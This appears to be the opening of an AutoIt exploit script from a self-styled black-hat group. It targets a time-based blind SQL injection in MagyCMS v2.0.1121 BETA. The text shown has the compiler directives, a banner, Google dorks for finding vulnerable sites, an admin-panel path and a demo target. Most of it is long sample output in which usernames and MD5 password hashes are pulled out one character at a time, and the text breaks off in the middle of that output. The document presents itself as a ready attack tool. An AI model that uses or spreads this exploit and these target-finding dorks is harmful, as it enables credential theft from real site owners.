#Region ;**** Directives created by AutoIt3Wrapper_GUI **** #AutoIt3Wrapper_Outfile=cpl.exe #AutoIt3Wrapper_UseUpx=n #AutoIt3Wrapper_Change2CUI=y #EndRegion ;**** Directives created by AutoIt3Wrapper_GUI **** #NoTrayIcon #include #include #include #include #cs THIS IS A COMPLETE EXPLOIT WHICH IS WRITEN IN AUTOIT SCRIPTING/PROGRAMMING LANGUAGE. THIS IS A CONSOLE APPLICATION. IT'S MAIN PURPOSE TO EXPLOIT BLIND SQL INJECTION VULNERABILITY IN magy cms v 2.0.1121 BETA USING TIME BASED WAY and obtain usernames + MD5 passwords. Default it'll obtain 5 usernames and corresponding MD5 PASSWORDS from vulnerable site. Since it uses time based way it is really slow exploit.But it is more convenient way than manual work;) In fact i coded it For Fun because we always prefer manual work. * ANYWAYS, save it as in eg: poc.au3 and COMPILE + ENJOY) * #ce #cs ============ * AZERBAIJAN BLACK HATZ PRESENTS!) * ================== -------------------------------------------------------------------- Vulnerable Software: MagyCMS v2.0.1121 BETA (Previous and Newest versions also affected) Vendor: http://www.emagy.com && broncoway.com -------------------------------------------------------------------- Vuln Type: Blind SQL injection Exploitation technique: Time Based. Exploit: Available -------------------------------------------------------------------- Credits: AkaStep & BOT_25 & CAMOUFL4G3 -------------------------------------------------------------------- ShouTz to mariaoza;) CAMOUFL4G3 says: FreeDom is Paradise :P DORK 1: google+ site:am Website by Broncoway DORK 2: google+ site:am inurl: /magycms/ Admin Panel: site.tld/magycms/Admin/ or site.tld/magycms/Admin/Login.php Demo: http://www.sgp.am -------------------------------------------------------------------- Example usage of exploit: cmd.exe >D:\programming1\magy_exploit\poc_HAZIR_USERNAME_DONE\x_azirmagy_exploit>cpl.exe http://192.168.0.15/learn/pwnmagyasap/ ###################################################### # MagyCMS v2.0.1121 BETA Blind SQL Injection Exploit # # Exploitation technique: Time Based # # Author: AkaStep & BOT_25 # ###################################################### ---------------------------------------- [+] Verifying your internet connection.... Please Wait...[+] ---------------------------------------- ---------------------------------------- [+] Inet Connection is OK .... [+] ---------------------------------------- ---------------------------------------- [+] Verifying is Target Site Vulnerable? Please wait...[+] ---------------------------------------- ---------------------------------------- [+] Reply from target site: [+] ---------------------------------------- [+] - - - - * Vulnerable! * - - - - . [+] ---------------------------------------- [+] Trying to get average value for sleep(1) if condition is TRUE...[+] ---------------------------------------- [+] Please wait... [+] ---------------------------------------- ---------------------------------------- [+] AVG sleep timeout FOR TRUE CONDITION IS: 1087 ms [+] ---------------------------------------- ---------------------------------------- [+] AVG sleep timeout FOR FALSE CONDITION IS: 93 ms [+] ---------------------------------------- ---------------------------------------- [+] Getting To Fetch Username(s) from table... Please wait... [+] ---------------------------------------- [+] TRUE AT OFFSET [0] Currently : [m]. Responce Time: 1066.51545360847 ms. Logging to axa.txt... [+] [+] TRUE AT OFFSET [0] Currently : [ma]. Responce Time: 1044.58516260608 ms. Logging to axa.txt... [+] [+] TRUE AT OFFSET [0] Currently : [man]. Responce Time: 1086.89845022196 ms. Logging to axa.txt... [+] [+] TRUE AT OFFSET [0] Currently : [mana]. Responce Time: 1046.11742474319 ms. Logging to axa.txt... [+] [+] TRUE AT OFFSET [0] Currently : [manag]. Responce Time: 1070.21242516611 ms. Logging to axa.txt... [+] [+] TRUE AT OFFSET [0] Currently : [manage]. Responce Time: 1063.79253086555 ms. Logging to axa.txt... [+] [+] TRUE AT OFFSET [0] Currently : [manager]. Responce Time: 1107.93347514309 ms. Logging to axa.txt... [+] [+] TRUE AT OFFSET [1] Currently : [r]. Responce Time: 1079.4193285235 ms. Logging to axa.txt... [+] [+] TRUE AT OFFSET [1] Currently : [ro]. Responce Time: 1092.09901537247 ms. Logging to axa.txt... [+] [+] TRUE AT OFFSET [1] Currently : [roo]. Responce Time: 1266.5817253381 ms. Logging to axa.txt... [+] [+] TRUE AT OFFSET [1] Currently : [root]. Responce Time: 1097.96913476208 ms. Logging to axa.txt... [+] [+] TRUE AT OFFSET [2] Currently : [d]. Responce Time: 1082.47758977717 ms. Logging to axa.txt... [+] [+] TRUE AT OFFSET [3] Currently : [t]. Responce Time: 1074.85995733176 ms. Logging to axa.txt... [+] [+] TRUE AT OFFSET [3] Currently : [te]. Responce Time: 1088.53933904958 ms. Logging to axa.txt... [+] [+] TRUE AT OFFSET [3] Currently : [tes]. Responce Time: 1080.99278273973 ms. Logging to axa.txt... [+] [+] TRUE AT OFFSET [3] Currently : [test]. Responce Time: 1073.98846265903 ms. Logging to axa.txt... [+] ---------------------------------------- [#] Username0 => [manager] [#] ---------------------------------------- ---------------------------------------- [#] Username1 => [root] [#] ---------------------------------------- ---------------------------------------- [#] Username2 => [d] [#] ---------------------------------------- ---------------------------------------- [#] Username3 => [test] [#] ---------------------------------------- ---------------------------------------- * Total 4 users * ---------------------------------------- ---------------------------------------- [+] END OF USERNAME FETCHING. PREVIOUS RECORDS ARE COMPLETE USERNAMES [+] ---------------------------------------- ---------------------------------------- [+] GOING TO FETCH MD5 PASSWORDS. This may take few minutes too. Please wait... [+] ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 0 Responce Time: 1122.93256476205 ms. Need to fetch other: [31] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04 Responce Time: 1147.73191815969 ms. Need to fetch other: [30] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e Responce Time: 1093.4105956323 ms. Need to fetch other: [29] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8 Responce Time: 1086.12022668676 ms. Need to fetch other: [28] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e Responce Time: 1088.69703233325 ms. Need to fetch other: [27] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e4 Responce Time: 1079.73130163186 ms. Need to fetch other: [26] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47 Responce Time: 1089.67269514766 ms. Need to fetch other: [25] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e Responce Time: 1120.84654283897 ms. Need to fetch other: [24] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e6 Responce Time: 1096.57454880375 ms. Need to fetch other: [23] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68 Responce Time: 1197.06674603001 ms. Need to fetch other: [22] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68a Responce Time: 1117.15728038546 ms. Need to fetch other: [21] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68a7 Responce Time: 1074.80582819299 ms. Need to fetch other: [20] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68a7b Responce Time: 1090.67017703246 ms. Need to fetch other: [19] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68a7b5 Responce Time: 1095.4439395126 ms. Need to fetch other: [18] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68a7b58 Responce Time: 1079.56000213028 ms. Need to fetch other: [17] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68a7b585 Responce Time: 1121.39697688334 ms. Need to fetch other: [16] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68a7b5859 Responce Time: 1069.7244734608 ms. Need to fetch other: [15] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68a7b58594 Responce Time: 1088.90167696824 ms. Need to fetch other: [14] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68a7b58594f Responce Time: 1090.38322342555 ms. Need to fetch other: [13] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68a7b58594fd Responce Time: 1131.33884657918 ms. Need to fetch other: [12] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68a7b58594fdc Responce Time: 1085.94070681407 ms. Need to fetch other: [11] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68a7b58594fdcf Responce Time: 1086.03164216324 ms. Need to fetch other: [10] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68a7b58594fdcf9 Responce Time: 1085.01732856736 ms. Need to fetch other: [9] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68a7b58594fdcf99 Responce Time: 1090.81806852607 ms. Need to fetch other: [8] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68a7b58594fdcf994 Responce Time: 1164.10285238106 ms. Need to fetch other: [7] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68a7b58594fdcf994c Responce Time: 1087.62590294072 ms. Need to fetch other: [6] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68a7b58594fdcf994c5 Responce Time: 1084.24126538578 ms. Need to fetch other: [5] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68a7b58594fdcf994c5d Responce Time: 1110.72200045738 ms. Need to fetch other: [4] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68a7b58594fdcf994c5d4 Responce Time: 1095.35167837798 ms. Need to fetch other: [3] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68a7b58594fdcf994c5d49 Responce Time: 1100.45665915848 ms. Need to fetch other: [2] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68a7b58594fdcf994c5d490 Responce Time: 1141.79013618122 ms. Need to fetch other: [1] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68a7b58594fdcf994c5d490d Responce Time: 1166.55627727462 ms. Need to fetch other: [ *NONE* ] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e Responce Time: 1171.26590832908 ms. Need to fetch other: [31] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e1 Responce Time: 1132.57401498087 ms. Need to fetch other: [30] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10 Responce Time: 1208.55810555533 ms. Need to fetch other: [29] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10a Responce Time: 1123.42031597051 ms. Need to fetch other: [28] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10ad Responce Time: 1122.12616389991 ms. Need to fetch other: [27] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc Responce Time: 1082.92028182339 ms. Need to fetch other: [26] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3 Responce Time: 1089.85126266028 ms. Need to fetch other: [25] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc39 Responce Time: 1140.08007343197 ms. Need to fetch other: [24] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc394 Responce Time: 1148.83027251909 ms. Need to fetch other: [23] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949 Responce Time: 1091.6165547748 ms. Need to fetch other: [22] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949b Responce Time: 1087.22355838061 ms. Need to fetch other: [21] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949ba Responce Time: 1073.28650311553 ms. Need to fetch other: [20] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949ba5 Responce Time: 1075.00146049429 ms. Need to fetch other: [19] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949ba59 Responce Time: 1075.08258904097 ms. Need to fetch other: [18] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949ba59a Responce Time: 1103.84616628081 ms. Need to fetch other: [17] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949ba59ab Responce Time: 1088.21680476932 ms. Need to fetch other: [16] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949ba59abb Responce Time: 1091.30892994201 ms. Need to fetch other: [15] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949ba59abbe Responce Time: 1120.06679051525 ms. Need to fetch other: [14] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949ba59abbe5 Responce Time: 1102.02194814024 ms. Need to fetch other: [13] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949ba59abbe56 Responce Time: 1142.12833929081 ms. Need to fetch other: [12] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949ba59abbe56e Responce Time: 1103.72041465256 ms. Need to fetch other: [11] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949ba59abbe56e0 Responce Time: 1111.04395079055 ms. Need to fetch other: [10] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949ba59abbe56e05 Responce Time: 1214.34433706028 ms. Need to fetch other: [9] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949ba59abbe56e057 Responce Time: 1163.34768347812 ms. Need to fetch other: [8] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949ba59abbe56e057f Responce Time: 1201.57191540286 ms. Need to fetch other: [7] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949ba59abbe56e057f2 Responce Time: 1138.68858765629 ms. Need to fetch other: [6] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949ba59abbe56e057f20 Responce Time: 1116.66783999098 ms. Need to fetch other: [5] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949ba59abbe56e057f20f Responce Time: 1098.96241373153 ms. Need to fetch other: [4] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949ba59abbe56e057f20f8 Responce Time: 1130.48200572043 ms. Need to fetch other: [3] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949ba59abbe56e057f20f88 Responce Time: 1108.71546050055 ms. Need to fetch other: [2] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949ba59abbe56e057f20f883 Responce Time: 1116.813345572 ms. Need to fetch other: [1] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949ba59abbe56e057f20f883e Responce Time: 1088.2162383657 ms. Need to fetch other: [ *NONE* ] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 3 Responce Time: 1112.91223563393 ms. Need to fetch other: [31] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 32 Responce Time: 1103.2336007669 ms. Need to fetch other: [30] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326 Responce Time: 1073.39268625061 ms. Need to fetch other: [29] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 3263 Responce Time: 1078.83931116799 ms. Need to fetch other: [28] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 32637 Responce Time: 1073.24368450567 ms. Need to fetch other: [27] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373 Responce Time: 1097.87935978848 ms. Need to fetch other: [26] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373d Responce Time: 1156.96056540113 ms. Need to fetch other: [25] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da Responce Time: 1072.94168611591 ms. Need to fetch other: [24] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da5 Responce Time: 1109.29933992676 ms. Need to fetch other: [23] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da56 Responce Time: 1078.17109775162 ms. Need to fetch other: [22] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da562 Responce Time: 1091.15269276676 ms. Need to fetch other: [21] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da5622 Responce Time: 1076.48035788689 ms. Need to fetch other: [20] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da56226 Responce Time: 1135.50237933379 ms. Need to fetch other: [19] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da562269 Responce Time: 1203.56181913304 ms. Need to fetch other: [18] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da5622693 Responce Time: 1090.62271190795 ms. Need to fetch other: [17] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da56226931 Responce Time: 1092.65591544045 ms. Need to fetch other: [16] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da562269316 Responce Time: 1100.2446888696 ms. Need to fetch other: [15] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da5622693167 Responce Time: 1094.95098541072 ms. Need to fetch other: [14] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da56226931679 Responce Time: 1128.80178191581 ms. Need to fetch other: [13] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da562269316790 Responce Time: 1169.40833252404 ms. Need to fetch other: [12] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da5622693167903 Responce Time: 1096.74959509033 ms. Need to fetch other: [11] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da56226931679032 Responce Time: 1178.17792216336 ms. Need to fetch other: [10] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da562269316790326 Responce Time: 1106.2009016093 ms. Need to fetch other: [9] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da562269316790326c Responce Time: 1300.28445742105 ms. Need to fetch other: [8] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da562269316790326c0 Responce Time: 1092.92270156983 ms. Need to fetch other: [7] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da562269316790326c00 Responce Time: 1127.17008586904 ms. Need to fetch other: [6] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da562269316790326c00a Responce Time: 1098.36618620519 ms. Need to fetch other: [5] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da562269316790326c00a9 Responce Time: 1113.63942520058 ms. Need to fetch other: [4] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da562269316790326c00a99 Responce Time: 1125.85533775888 ms. Need to fetch other: [3] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da562269316790326c00a997 Responce Time: 1151.71279577202 ms. Need to fetch other: [2] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da562269316790326c00a9972 Responce Time: 1133.74918720454 ms. Need to fetch other: [1] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da562269316790326c00a9972f Responce Time: 1126.98230301967 ms. Need to fetch other: [ *NONE* ] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 7 Responce Time: 1109.83144103983 ms. Need to fetch other: [31] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74 Responce Time: 1098.13795060885 ms. Need to fetch other: [30] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a Responce Time: 1096.22027336493 ms. Need to fetch other: [29] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5 Responce Time: 1112.61976585727 ms. Need to fetch other: [28] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d Responce Time: 1142.74313282603 ms. Need to fetch other: [27] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1 Responce Time: 1084.91810768561 ms. Need to fetch other: [26] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1f Responce Time: 1112.79996992547 ms. Need to fetch other: [25] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ff Responce Time: 1098.22970548891 ms. Need to fetch other: [24] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffc Responce Time: 1162.94171493733 ms. Need to fetch other: [23] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce Responce Time: 1288.16907398647 ms. Need to fetch other: [22] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce4 Responce Time: 1141.83313523826 ms. Need to fetch other: [21] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce47 Responce Time: 1103.65852377924 ms. Need to fetch other: [20] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce472 Responce Time: 1168.90490496762 ms. Need to fetch other: [19] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce472f Responce Time: 1096.50154288596 ms. Need to fetch other: [18] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce472f0 Responce Time: 1139.7646542839 ms. Need to fetch other: [17] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce472f02 Responce Time: 1108.4753730338 ms. Need to fetch other: [16] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce472f020 Responce Time: 1088.28836460353 ms. Need to fetch other: [15] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce472f0206 Responce Time: 1077.87990864862 ms. Need to fetch other: [14] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce472f0206d Responce Time: 1079.14208898928 ms. Need to fetch other: [13] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce472f0206dd Responce Time: 1108.17988076703 ms. Need to fetch other: [12] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce472f0206dd4 Responce Time: 1164.49911938021 ms. Need to fetch other: [11] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce472f0206dd48 Responce Time: 1100.86175303173 ms. Need to fetch other: [10] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce472f0206dd48c Responce Time: 